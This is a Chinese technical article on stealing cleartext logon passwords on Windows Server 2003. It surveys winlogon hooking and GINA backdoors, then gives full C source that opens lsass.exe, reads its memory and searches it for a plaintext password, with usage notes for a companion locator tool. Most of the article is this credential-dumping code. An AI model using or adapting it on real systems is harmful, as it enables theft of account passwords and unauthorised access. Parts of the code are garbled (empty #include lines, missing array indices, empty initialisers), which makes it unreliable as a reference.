如何在win 2003中得到登陆密码

在所有NT系统中,都是有几种方法可以得到登陆用户的密码的。我知道的三种方法可以达到目的。

  1.hook了winlogon中几个函数,网上也有这类型的程序,叫winlogonhijack的项目在rootkit.com中有提供,不过那个项目只对本地登陆用户有效,远程登陆用户无效。

  2.使用Gina和winlogon进行套接,只要对某些函数执行自己的记录密码的代码,就可以将密码记录下来,稳定性高,而且对本地或远程登陆都有效,不过现存的gina后门程序在XP或2003中都有些函数没有被导出过,主要因为xp和2003等在winlogon中加入了新的函数。

  3.直接读取内存数据得到明文密码。在NT 4.0/2K中,早就有程序findpass可以直接读到winlogon进程中的内存数据而直接得到登陆用户密码,因为在NT4.0和2K中,帐号的信息,包括域名,帐号和密码都是有规律地在winlogon内存中的特定地址中,所以可以很简单就得到。但在XP和2003系统中,这样方法是无效的了,似乎我们是没有办法直接读出明文地址了。下面我们就来谈谈如何象findpass在NT 4.0和2K在,在server 2003中得到登陆用户的密码。

  虽然XP和2003是不象以前的NT系统那样将登陆用户信息保存在winlogon进程的内存地址内,但是基Lsass进程对于要处理些信息时,需要得到明文的登陆用户密码,所以登陆用户的密码会在Lsass进程中出现(微软没有将密码在Lsass进程中进行加密,微软的说法是因为Lsass需要得到明文的密码,就算将密码加密,也都只能用可逆的方法加密,只要跟踪lsass的操作,一样可以得到明文密码,所以微软使用了比较懒惰的方法,可能也是为了加快响应速度,所以将明文密码更是放在lsass进程内存内)。说到这里,大家心里都清楚了,登陆用户的密码是在lsass进程的内存中。对,就是这么一回事,但是要得到这个明文密码,真是象使用NT 4.0和2K下的findpass那样容易吗?事实上并不是那么容易,因为以下几个原因:

  A.密码存放在lsass进程中的内存地址是没有规律的

  B.密码有可能被最后登陆的用户复盖(例如管理员abc从本地登陆,然后管理员bbb从远程登陆,然后管理员bbb注销终端,存放在lsass.exe进程内存中的密码,还是管理员bbb的密码),又或者用户登陆后,然后注销了,那么我们就算得到了密码,也不知道是哪个用户的密码。

  C.密码前后的数据也是没有规律的,如果有规律,例如密码前的数据,一定是有一段全是01字符的数据段,那么定位密码就简单。

  原因A和C都给我们带来定位密码的困难,原B就带来不能确定密码和帐号对应的问题.看来微软在新的系统还是做过点功夫。不过我们是不会放弃的,就算是碰碰运气,也看能不能得到密码,反正就算失败,也没什么关系。

  最后的代码,是我写来测试是不是能在2003的系统中得到登际用户的密码,结果也正好象我们上面的分析一样(当然了,上面的结果是用这程序测测得到的)。成功率当然不高,因为受太多原因所影响,定位密码上的困难或者无法定位,或者得到不是密码的信息等等的原因,都令失败率显得相当高,不过总还是一种方法,或者将来有人可以准确定位到,那就是令人高兴了。虽然说失败率高,但在一种情况下,成功率却是很高的,那就是管理员只是在本地或终端中登陆了,以后再没有用户从本地或终端登陆过,而且管理员也没有锁上过系统,那么成功率就会是相当高的了。

提高成功率的两种做法:

  1.程序直接写成服务,定时检查本地或远程登陆(其实没什么分别),当检测到登陆后,去搜索lsass进程内存,尝试得到密码。

  2.程序模拟一个登陆(使用LogonUser()就能搞定),因为使用LogonUser()这个API,你要提供帐号名和对应的正确的密码,才可以成功,然后你就可以去搜索lsass进程内存。因为知道密码是什么,我们就能定位到密码是保存在什么地方。因为登陆用户的密码都是保存在同一个地址或相离不远的地址中,模拟登陆和搜索,可以先定位以后登陆的用户的密码会大约保存在什么位置。

  无论怎说,三种方法中,最稳定,最安全的方法还是使用Gina那种方法.Hijack了winlogn一些API的方法,毕竟是改动了系统的东西,对系统的稳定性来说,会有考验,直接搜索lsass进程内存的方法呢,虽说也是困难,但准确性,成功率却又是低。

  下面的代码使用的是很笨,而且很原始的搜索方法,主要是搜索Lsass内存中"LocalSystem Remote Procedure"这个字符串,因为在相当多的测试中,密码都是保存在有这个字符串的地址后一点的位置中,当然了,很多系统并没有这个字符串,或者就算有,我们得到的都是错误的密码。

代码: //********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
// Used Is Pretty Unwise,But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include
#include
#include

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char Password[MAX_PATH] = ; // Store The Found Password

// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID);
int Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration

int main()
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

if (!Is2003()) // Check Out If The Box Is 2003
{
printf("The Program Can't Only Run On Windows 2003 Platform\n");
return -1;
}

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom
{
return -1;
}

FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
}
// End main()

//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
// Since The Password Is Near The Above Location,But It's Not Always True That
// We Will Find The Magic String,Or Even We Find It,The Password May Be Located
// At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i < nSize ; i++)
{
/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
The Magic String,We Have To Do It Manually And Slowly
*/
if (Buffer == 'L')
{
OffSet = 0;
if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
{
OffSet += strlen("LocalSystem") + 1;
if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
{
OffSet += strlen("Remote") + 1;
if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
{
OffSet += strlen("Procedure") + 1;
if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
{
i += OffSet;
break;
}
}
}
}
}
}

if (i < nSize)
{
ZeroMemory(Password,sizeof(Password));
for (; i < nSize ; i++)
{
if (Buffer == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
That Way
*/
j = i + 7;
for (; j < nSize; j += 2)
{
if (Buffer[j] > 0)
{
Password[Count++] = Buffer[j];
}
else
{
break;
}
}
return i + 7; // One Flag To Indicate We Find The Password
}
}
}
return -1; // Well,We Fail To Find The Password,And This Always Happens
}
// End Search

//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shot\n");
return 0;
}

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;
}

do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap, &pe32));

CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()

//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = ;
DWORD ByteGet = 0;
int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
if (hProcess == NULL)
{
printf("Fail To Open Process\n");
return FALSE;
}

if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To Read Memory\n");
CloseHandle(hProcess);
return FALSE;
}

CloseHandle(hProcess);

Found = Search(Buffer,ByteGet); // Search The Password
if (Found >= 0) // We May Find The Password
{
if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);
}
}
else
{
printf("Fail To Find The Password\n");
}
return TRUE;
}
// End FindPassword

//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File

  附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.

  用法:

  1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置

  2.Locator 用户名 密码 -> 在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。

(0)

相关推荐

  • 如何在win 2003中得到登陆密码

    在所有NT系统中,都是有几种方法可以得到登陆用户的密码的.我知道的三种方法可以达到目的. 1.hook了winlogon中几个函数,网上也有这类型的程序,叫winlogonhijack的项目在rootkit.com中有提供,不过那个项目只对本地登陆用户有效,远程登陆用户无效. 2.使用Gina和winlogon进行套接,只要对某些函数执行自己的记录密码的代码,就可以将密码记录下来,稳定性高,而且对本地或远程登陆都有效,不过现存的gina后门程序在XP或2003中都有些函数没有被导出过,主要因为x

  • 在win 2003中得到登陆密码

    在所有NT系统中,都是有几种方法可以得到登陆用户的密码的.我知道的三种方法可以达到目的. 1.hook了winlogon中几个函数,网上也有这类型的程序,叫winlogonhijack的项目在rootkit.com中有提供,不过那个项目只对本地登陆用户有效,远程登陆用户无效. 2.使用Gina和winlogon进行套接,只要对某些函数执行自己的记录密码的代码,就可以将密码记录下来,稳定性高,而且对本地或远程登陆都有效,不过现存的gina后门程序在XP或2003中都有些函数没有被导出过,主要因为x

  • Win 2003中添加LPT端口

    本文说明如何在基于 Microsoft Windows Server 2003 的计算机中添加附加LPT端口. 默认情况下,在Windows Server 2003中存在3个 LPT可用端口,它们是 LPT1.LPT2 和 LPT3.可以添加附加LPT端口直到LPT9.添加附加 LPT 端口后,该端口作为可用打印机端口显示在"添加打印机向导"中. 如何添加附加LPT端口 单击开始\运行. 注意:"注册表编辑器"使用不当可造成严重问题,这些问题可能需要重新安装操作系统

  • Win 2003中快速建立ADSL拨号

    在 完成了计算机硬件的连接之后,若要实现ADSL连接上Internet,通常需要借助专门的虚拟拨号软件才可以进行(如:WinPoET.EnterNet.300 RASPPPOE等).但是,当我们的操作系统是Windows Server 2003时,只需要利用系统自带的Internet网络功能,进行一些简单的设置后,就可以直接上网了. 右击桌面上的"网上邻居→属性"后,会打开网络连接窗口.在左侧的网络任务中点击"创建一个新的连接",打开连接向导对话框,在欢迎对话框中点

  • Win 2003中配置ASP.net环境

    大家知道,Microsoft为了更好地预防恶意用户和攻击者的攻击,在默认情况下,没有将 IIS6.0 安装到 Windows Server 2003 家族的成员上.而且,当我们最初安装 IIS6.0 时,该服务在高度安全和"锁定"模式下安装.在默认情况下,IIS6.0 只为静态内容提供服务即,诸如 ASP.ASP.NET.在服务器端的包含文件.WebDAV 发布和 FrontPage Server Extensions 功能只有在启用时才工作.在windows 2003 IIS 6.0

  • Win 2003中打开DirectX加速

    刚刚安装了Windows 2003,但是现在发现很多3D游戏都不能运行,只有一些传统2D平面游戏还能勉强运行,而且速度很慢.感觉上Windows 2003在运行PhotoShop时很快,但是为何不能运行3D游戏? 这并不是因为Windows 2003不支持3D游戏,而是系统设置的问题.首先请确保以正确的方式安装好显卡驱动,然后就要打开DirectX加速.DirectX加速是3D游戏最基本的需要,然而"为了"使Windows Server 2003更为单一地面向服务器平台应用,微软居然默

  • Win 2003中实现网络共享还原

    大家一定记得Windows XP的系统还原功能吧,但它只能还原本机的文件,对共享文件却无能为力了.随着Windows Server 2003操作系统的推出,这个问题迎刃而解.这个小东东就是Windows Server 2003的卷影副本服务(Volume Shadow Copy Service),它以预定的时间间隔为存储在网络共享文件中的文件创建副本文件.一旦共享文件被恶意修改或破坏,用户就能根据这些副本文件进行还原,是不是很方便,我们一起来用吧! 第一步:启用卷影副本服务.在Windows S

  • 如何在vuejs项目中使用md5加密密码的实现

    目录 1.NPM 安装: 2.全局用法 3.局部用法 概念 MD5加密有什么用?为什么要使用MD5加密? MD5算法的用途是什么? 具体使用步骤: 1.NPM 安装: npm install --save js-md5 2.全局用法 2.1.全局引用 import md5 from 'js-md5'; Vue.prototype.$md5 = md5; 2.2.全局使用 将您需要加密的信息放进去: this.$md5('This is encrypted content') // 6f43dd5

  • 突破Win 2003系统的种种限制

    如果你是一个狂热的多媒体爱好者,可能你会对自己新装的Windows Server 2003感到失望,好像又回到了Windows 2000的时代,而且附加的限制简直是有过之而无不及,谁叫微软把它定位在服务器市场呢.其实你也不要灰心,只要我们充分发扬DIY精神,完全可以还你一个满意的系统. 一.自动登录不求人 和Windows 2000 Server一样,Windows Server 2003进入系统时也要求同时按下"Ctrl+Alt+Del"组合键,然后输入用户名和密码,才能登录.在这里

  • 突破Win 2003系统种种限制

    如果你是一个狂热的多媒体爱好者,可能你会对自己新装的Windows Server 2003感到失望,好像又回到了Windows 2000的时代,而且附加的限制简直是有过之而无不及,谁叫微软把它定位在服务器市场呢.其实你也不要灰心,只要我们充分发扬DIY精神,完全可以还你一个满意的系统. 一.自动登录不求人 和Windows 2000 Server一样,Windows Server 2003进入系统时也要求同时按下"Ctrl+Alt+Del"组合键,然后输入用户名和密码,才能登录.在这里

随机推荐